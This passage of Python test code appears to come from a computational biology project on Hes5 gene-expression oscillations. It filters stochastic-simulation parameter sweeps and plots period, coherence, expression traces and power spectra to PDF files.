# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,10,4] <
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4],
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2,
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# # my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.15))))
# np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# my_parameter_sweep_results[:,9,3] < 400)))))
#
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
my_sweep_parameters = my_posterior_samples[increase_indices]
try:
my_pairplot = hes5.plot_posterior_distributions(my_sweep_parameters)
my_pairplot.axes[-1,0].set_xlim(0,4)
# plt.style.use('classic')
my_pairplot.savefig(os.path.join(os.path.dirname(__file__),
'output',
'pairplot_low_transcription_coherence_increase_' + parameter_name + '.pdf'))
except:
print('could not pairplot ' + parameter_name)
def xest_plot_traces_for_repression_threshold_decrease(self):
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_low_transcription' +
'repression_threshold.npy'))
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] <
my_parameter_sweep_results[:,4 ,4],
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
np.logical_and(my_parameter_sweep_results[:,4,4] >
my_parameter_sweep_results[:,9,4]*8,
np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,4,4] > 0.2))))
#
my_posterior_results = model_results[increase_indices]
my_posterior_samples = my_posterior_samples[increase_indices]
number_of_traces = 10
figuresize = (6,9)
my_figure = plt.figure(figsize = figuresize)
outer_grid = matplotlib.gridspec.GridSpec(3, 3 )
repression_threshold_percentages = [1.0, 0.5, 0.25] #corresponds to 1.0 and 0.5
y_limits = [[4,8],
[2,6],
[0,4]]
for figure_row_index, repression_threshold_percentage in enumerate(repression_threshold_percentages):
for parameter_index in range(3):
this_double_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(2, 1,
subplot_spec = outer_grid[figure_row_index*3 + parameter_index],
height_ratios= [number_of_traces, 1])
this_inner_grid = matplotlib.gridspec.GridSpecFromSubplotSpec(number_of_traces, 1,
subplot_spec=this_double_grid[0], hspace=0.0)
this_parameter = my_posterior_samples[parameter_index]
this_results = my_posterior_results[parameter_index]
_, these_traces = hes5.generate_multiple_langevin_trajectories(number_of_trajectories = 200,
duration = 1500*5,
repression_threshold = this_parameter[2]*
repression_threshold_percentage,
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2]*
repression_threshold_percentage,
equilibration_time = 1000)
this_power_spectrum, this_coherence, _ = hes5.calculate_power_spectrum_of_trajectories(these_traces)
for subplot_index in range(number_of_traces):
this_axis = plt.Subplot(my_figure, this_inner_grid[subplot_index])
my_figure.add_subplot(this_axis)
this_trace = hes5.generate_langevin_trajectory(
duration = 1500,
repression_threshold = this_parameter[2]*
repression_threshold_percentage,
mRNA_degradation_rate = np.log(2)/30.0,
protein_degradation_rate = np.log(2)/90,
transcription_delay = this_parameter[3],
basal_transcription_rate = this_parameter[0],
translation_rate = this_parameter[1],
initial_mRNA = 10,
initial_protein = this_parameter[2]*
repression_threshold_percentage,
hill_coefficient = this_parameter[4],
equilibration_time = 1000)
plt.plot(this_trace[:,0], this_trace[:,2]/1e4)
plt.ylim(y_limits[figure_row_index])
# this_axis.locator_params(axis='y', tight = True, nbins=1)
# this_axis.locator_params(axis='y', nbins=2)
this_axis.locator_params(axis='x', tight = True, nbins=3)
plt.yticks([])
this_axis.tick_params(axis='both', length = 1)
if subplot_index == 0:
plt.title('Coherence: ' + '{:.2f}'.format(this_coherence) +
r', $\alpha_m =$ ' + '{:.2f}'.format(this_parameter[0]) +
'\n' + r'$\alpha_p =$ ' + '{:.2f}'.format(this_parameter[1]) +
r', $p_0 = $ ' + '{:.2f}'.format(this_parameter[2]) +
r', $\tau = $ ' + '{:.2f}'.format(this_parameter[3]),
fontsize = 5)
if subplot_index < number_of_traces - 1:
this_axis.xaxis.set_ticklabels([])
if parameter_index !=0:
this_axis.yaxis.set_ticklabels([])
if parameter_index == 0 and subplot_index == 5:
plt.ylabel('Expression/1e4', labelpad = 15)
plt.xlabel('Time [min]', labelpad = 2)
plt.yticks(y_limits[figure_row_index])
this_axis = plt.Subplot(my_figure, this_double_grid[1])
my_figure.add_subplot(this_axis)
plt.xlabel('Frequency [1/min]', labelpad = 2)
plt.plot(this_power_spectrum[:,0], this_power_spectrum[:,1])
this_axis.locator_params(axis='x', tight = True, nbins=3)
this_axis.tick_params(axis='both', length = 1)
if parameter_index == 0:
plt.ylabel('Power', labelpad = 15)
max_index = np.argmax(this_power_spectrum[:,1])
max_power_frequency = this_power_spectrum[max_index,0]
left_frequency = max_power_frequency*0.9
right_frequency = max_power_frequency*1.1
plt.axvline(left_frequency, color = 'black')
plt.axvline(right_frequency, color = 'black')
plt.xlim(0.0,0.01)
plt.yticks([])
plt.axhline(3)
plt.figtext(0.5,0.98,r'Repression threshold ratio at 1.0', fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.figtext(0.5,0.65,r'Repression threshold ratio at 0.5', fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.figtext(0.5,0.32,r'Repression threshold ratio at 0.25', fontsize = 10,
rotation = 'horizontal', verticalalignment = 'bottom', multialignment = 'center',
horizontalalignment = 'center')
plt.tight_layout()
my_figure.subplots_adjust(hspace = 0.5)
my_figure.savefig(os.path.join(os.path.dirname(__file__),'output','repression_threshold_decrease.pdf'))
def xest_plot_low_transcription_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_parameter_sweeps_hill_low_transcription' + parameter_name + '.npy'))
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','low_transcription_sweep_' + parameter_name + '.pdf'))
def xest_plot_heterozygous_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_heterozygous_sweeps_' + parameter_name + '.npy'))
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','heterozygous_sweep_' + parameter_name + '.pdf'))
def xest_make_relative_multiple_parameter_variation(self):
number_of_parameter_points = 20
number_of_trajectories = 200
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_parameter_sweep_results = hes5.conduct_all_parameter_sweeps_at_parameters(my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
for parameter_name in my_parameter_sweep_results:
np.save(os.path.join(os.path.dirname(__file__), 'output','all_relative_parameter_sweeps_' + parameter_name + '.npy'),
my_parameter_sweep_results[parameter_name])
def xest_plot_relative_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_relative_parameter_sweeps_' + parameter_name + '.npy'))
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_relative_sweep_' + parameter_name + '.pdf'))
def xest_plot_relative_parameter_variation_differently(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_relative_parameter_sweeps_' + parameter_name + '.npy'))
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_relative_sweep_low_coherence_' + parameter_name + '.pdf'))
def xest_plot_relative_parameter_variation_coherence_increase(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
model_results = model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
reference_indices['mRNA_degradation_rate'] = 15
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_relative_parameter_sweeps_' + parameter_name + '.npy'))
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
increase_indices = np.where(my_parameter_sweep_results[:,10,4] <
my_parameter_sweep_results[:,reference_indices[parameter_name],4])
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_relative_sweep_coherence_increases_' + parameter_name + '.pdf'))
def xest_plot_all_parameter_variation(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_langevin_200reps')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
# my_parameter_sweep_results = hes5.conduct_protein_degradation_sweep_at_parameters(my_posterior_samples,
# number_of_parameter_points,
# number_of_trajectories)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'Transcription rate [1/min]'
x_labels['translation_rate'] = 'Translation rate [1/min]'
x_labels['repression_threshold'] = 'Repression threshold/1e4'
x_labels['time_delay'] = 'Transcription delay [min]'
x_labels['mRNA_degradation_rate'] = 'mRNA degradation [1/min]'
x_labels['protein_degradation_rate'] = 'Protein degradation [1/min]'
x_labels['hill_coefficient'] = 'Hill coefficient'
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'all_parameter_sweeps_' + parameter_name + '.npy'))
if parameter_name == 'repression_threshold':
my_parameter_sweep_results[:,:,0] /= 10000
my_posterior_samples[:,2] /= 10000
my_figure = plt.figure( figsize = (6.5, 1.5) )
my_figure2 = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
if parameter_name == 'protein_degradation_rate':
this_axis.axvline( np.log(2)/90 )
elif parameter_name == 'mRNA_degradation_rate':
this_axis.axvline( np.log(2)/30 )
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure2.add_subplot(131)
for results_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_name == 'protein_degradation_rate':
this_parameter = np.log(2)/90
elif parameter_name == 'mRNA_degradation_rate':
this_parameter = np.log(2)/30
elif parameter_name == 'hill_coefficient':
this_parameter = 5
else:
this_parameter = my_posterior_samples[results_index, parameter_indices[parameter_name]]
this_axis.plot(results_table[:,0] - this_parameter,
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(r'$\Delta$' + x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
if parameter_name == 'protein_degradation_rate':
this_axis.axvline( np.log(2)/90 )
elif parameter_name == 'mRNA_degradation_rate':
this_axis.axvline( np.log(2)/30 )
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
this_axis = my_figure2.add_subplot(132)
for results_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_name == 'protein_degradation_rate':
this_parameter = np.log(2)/90
elif parameter_name == 'mRNA_degradation_rate':
this_parameter = np.log(2)/30
elif parameter_name == 'hill_coefficient':
this_parameter = 5
else:
this_parameter = my_posterior_samples[results_index, parameter_indices[parameter_name]]
this_axis.plot(results_table[:,0] - this_parameter,
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(r'$\Delta$' + x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
if parameter_name == 'protein_degradation_rate':
this_axis.axvline( np.log(2)/90 )
elif parameter_name == 'mRNA_degradation_rate':
this_axis.axvline( np.log(2)/30 )
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','multiple_sweep_' + parameter_name + '.pdf'))
this_axis = my_figure2.add_subplot(133)
for results_index, results_table in enumerate(my_parameter_sweep_results):
if parameter_name == 'protein_degradation_rate':
this_parameter = np.log(2)/90
elif parameter_name == 'mRNA_degradation_rate':
this_parameter = np.log(2)/30
elif parameter_name == 'hill_coefficient':
this_parameter = 5
else:
